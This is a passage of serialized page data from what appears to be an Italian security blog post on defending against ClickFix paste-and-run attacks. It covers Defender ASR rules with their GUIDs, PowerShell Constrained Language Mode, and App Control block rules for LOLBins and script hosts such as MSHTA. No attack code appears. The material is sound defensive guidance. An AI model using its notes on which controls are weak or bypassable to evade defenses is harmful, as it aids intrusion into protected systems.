overflow-x: auto",[911,912,826,914,826,933],"table",{"style":913},"width:100%; border-collapse: collapse; font-size: 0.85rem",[915,916,917,918,826],"thead",{},"\n    ",[919,920,921,922,921,927,921,930,917],"tr",{},"\n      ",[923,924,926],"th",{"style":925},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #dde1e4; text-align: left; font-weight: 600","Regola",[923,928,929],{"style":925},"GUID",[923,931,932],{"style":925},"Rilevanza per ClickFix",[934,935,917,936,917,952,917,967,917,980,917,993,826],"tbody",{},[919,937,921,938,921,943,921,949,917],{},[939,940,942],"td",{"style":941},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa","Bloccare l'esecuzione di script potenzialmente offuscati",[939,944,946],{"style":945},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #f6f8fa; white-space: nowrap",[572,947,948],{},"5beb7efe-fd9a-4556-801d-275e5ffc04cc",[939,950,951],{"style":941},"Script offuscati o codificati nella fase di esecuzione ed evasione",[919,953,921,954,921,958,921,964,917],{},[939,955,957],{"style":956},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff","Impedire a JavaScript o VBScript di avviare contenuto eseguibile scaricato",[939,959,961],{"style":960},"border: 1px solid #d0d7de; padding: 0.5rem 0.75rem; background: #ffffff; white-space: nowrap",[572,962,963],{},"d3e037e1-3eb8-44c8-a917-57927947596d",[939,965,966],{"style":956},"WSH, .js o .vbs che avviano payload scaricati",[919,968,921,969,921,972,921,977,917],{},[939,970,971],{"style":941},"Consentire i file eseguibili solo se soddisfano un criterio di prevalenza, età o lista attendibile",[939,973,974],{"style":945},[572,975,976],{},"01443614-cd74-433a-b99e-2ecdc07bfc25",[939,978,979],{"style":941},"Eseguibili rilasciati di recente o rari",[919,981,921,982,921,985,921,990,917],{},[939,983,984],{"style":956},"Bloccare i contenuti eseguibili dal client di posta e dalla webmail",[939,986,987],{"style":960},[572,988,989],{},"be9ba2d9-53ea-4cdc-84e5-9b1eeee46550",[939,991,992],{"style":956},"Varianti di ClickFix consegnate via email",[919,994,921,995,921,998,921,1003,917],{},[939,996,997],{"style":941},"Impedire a tutte le applicazioni Office di creare processi figlio",[939,999,1000],{"style":945},[572,1001,1002],{},"d4f940ab-401b-4efc-aadc-ad5f3c50688a",[939,1004,1005],{"style":941},"Varianti con esca Office che avviano interpreti",[525,1007,1008],{},"Distribuisci ASR prima in modalità audit, poi come pilot, poi in modalità block. Tamper Protection è l'ultima linea: impedisce all'attaccante di disattivare i tuoi rilevamenti.",[525,1010,1011],{},"Su PowerShell stesso riduci il rischio legato agli interpreti legacy. Individua e rimuovi, dove fattibile, Windows PowerShell 2.0 e i componenti VBScript legacy, a cui mancano le funzionalità di logging e security delle versioni più recenti. Il passo successivo è il Constrained Language Mode (CLM), che limita gli elementi di linguaggio disponibili in PowerShell e blocca molte tecniche basate su script. Il CLM ha un valore di sicurezza robusto solo se lo impone una policy di system application control (App Control for Business); le varianti tramite variabile d'ambiente e AppLocker sono più deboli e aggirabili. E molti sistemi hanno bisogno del Full Language Mode per funzionare, per esempio il tooling di software deployment, motivo per cui il CLM è spesso praticabile solo in ambienti selezionati.",[525,1013,1014],{},"Arriviamo così ad App Control for Business (in precedenza WDAC). App Control impone una policy di code integrity su quali eseguibili, script e driver possono girare. La posizione strategica è default-deny più le block rule consigliate da Microsoft, la blocklist nota di LOLBin e bypass. App Control è anche il percorso di enforcement corretto per il CLM di PowerShell. La script enforcement blocca gli script host MSHTA e MSXML, forza PowerShell nel CLM e blocca l'uso non consentito del Windows Script Host. Alcuni fatti sul comportamento sono importanti:",[823,1016,826,1017,826,1020,826,1023],{"style":825},[828,1018,1019],{},"Le base policy che si fidano di Windows non bloccano automaticamente i LOLBin fidati. Devi fare il merge delle block rule consigliate da Microsoft per chiudere i bypass noti.",[828,1021,1022],{},"App Control non impedisce l'avvio di powershell.exe o cmd.exe firmati. Limita ciò che possono fare (CLM, nessun payload non firmato o non consentito) e non governa il contenuto di cmd.exe, .bat o .cmd. Per questo va stratificato con ASR e con l'hardening dell'avvio, non usato da solo.",[828,1024,1025],{},"La modalità audit non è neutra: la script enforcement blocca anche in audit l'esecuzione di MSHTA e MSXML e può modificare il comportamento del CLM di PowerShell. Per questo App Control in audit deve essere limitato a pilot o ring fin dalla prima distribuzione, mai esteso a tutta la flotta.",[525,1027,1028],{},"App Control è il singolo controllo con la confidence più alta contro le fasi di esecuzione di interpreti, LOLBin e payload, e impone un CLM robusto. Allo stesso tempo porta con sé la complessità di deployment più alta e il rischio di rollback più alto, perché una configurazione errata blocca l'esecuzione. Introducilo tramite ring pilota controllati.",[551,1030,1032],{"id":1031},"dove-entriamo-in-gioco","Dove entriamo in gioco",[525,1034,557],{},[525,1036,1037,1038,803],{},"ClickFix è veloce, e i rilevamenti nativi di Microsoft coprono la maggior parte, ma non tutto. Per i nostri clienti CSOC estendiamo continuamente la copertura dove emergono lacune: esecuzione tramite Windows Terminal, support scam guidati da RAT e comportamento post-compromise. Se vuoi sapere a che punto è il tuo ambiente, ",[1039,1040,1041],"a",{"href":276},"contattaci",[1043,1044,1045],"style",{},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}",{"title":529,"searchDepth":530,"depth":530,"links":1047},[1048,1049,1050,1051,1052,1053,1054,1055,1056],{"id":553,"depth":530,"text":554},{"id":635,"depth":530,"text":636},{"id":647,"depth":530,"text":648},{"id":670,"depth":530,"text":671},{"id":782,"depth":530,"text":783},{"id":812,"depth":530,"text":813},{"id":849,"depth":530,"text":850},{"id":865,"depth":530,"text":866},{"id":1031,"depth":530,"text":1032},"post",{"lang":1059,"seoTitle":1060,"titleClass":1061,"date":1062,"categories":1063,"blogtitlepic":1064,"socialimg":1065,"customExcerpt":1066,"keywords":1067,"asideNav":1068,"published":325},"it","Rilevare e prevenire gli attacchi ClickFix: il trucco del paste con Win+R","h2-font-size","2026-09-21",[235],"head-clickfix.jpg","/blog/heads/head-clickfix.jpg","ClickFix trasforma gli utenti nel proprio attaccante: un CAPTCHA falso, un copia-incolla, e il codice malevolo gira in memoria senza che nulla finisca su disco. Come Microsoft Defender rileva l'attacco, dove il rilevamento arriva ai suoi limiti e come chiudi la lacuna con un hunt su RunMRU e quattro layer di protezione.","ClickFix, attacco ClickFix, rilevamento ClickFix, prevenire ClickFix, CAPTCHA falso, attacco Win+R, RunMRU KQL, Microsoft Defender, Attack Surface Reduction, regole ASR, App Control for Business, WDAC, Constrained Language Mode, Network Protection, AMSI, Endpoint Privilege Management, infostealer, LOLBin, hardening di PowerShell",{"menuItems":1069},[1070,1073,1076,1079,1082,1085,1088,1091,1094],{"href":1071,"text":1072},"#la-catena-di-attacco-clickfix","La catena di attacco",{"href":1074,"text":1075},"#cosa-rileva-microsoft-defender","Cosa rileva Defender",{"href":1077,"text":1078},"#dove-il-rilevamento-nativo-arriva-ai-suoi-limiti","Dove si incaglia",{"href":1080,"text":1081},"#chiudere-la-lacuna-un-hunt-su-runmru","Chiudere la lacuna",{"href":1083,"text":1084},"#layer-di-protezione-1-bloccare-la-consegna","Layer 1: consegna",{"href":1086,"text":1087},"#layer-di-protezione-2-bloccare-il-trucco","Layer 2: il trucco",{"href":1089,"text":1090},"#layer-di-protezione-3-bloccare-lazione","Layer 3: l'azione",{"href":1092,"text":1093},"#layer-di-protezione-4-bloccare-lesecuzione","Layer 4: esecuzione",{"href":1095,"text":1032},"#dove-entriamo-in-gioco","/posts/2026-09-21-clickfix-prevent-detect",{"title":545,"description":529},"posts/2026-09-21-clickfix-prevent-detect",[1100,1101,1102],"Defender","SOC","Endpoint Security","eQLpJ-Ju8tvUWZQ-UitaVV0zu096LYwOTDpkPA7DbEs",[],{"id":1106,"extension":1107,"meta":1108,"stem":8,"__hash__":1119},"authors_data/authors.json","json",{"Fritz Zurhorst":1109,"Nadine Klein":1114},{"display_name":520,"avatar":1110,"permalink":1111,"linkedin":1112,"imageOffsetTop":1113},"people/people-fritz-zurhorst.png","/authors/fritz-zurhorst","friedemann-z","72%",{"display_name":547,"avatar":1115,"permalink":1116,"twitter":1117,"linkedin":1118,"imageOffsetTop":1113},"people/people-nadine-kern.png","/authors/nadine-kern","nadineausRT","nadine-kern","1csawlkJxRljy93GTOnXEkwLqAv9Lcj-apxRvoodAOY",1791383968713]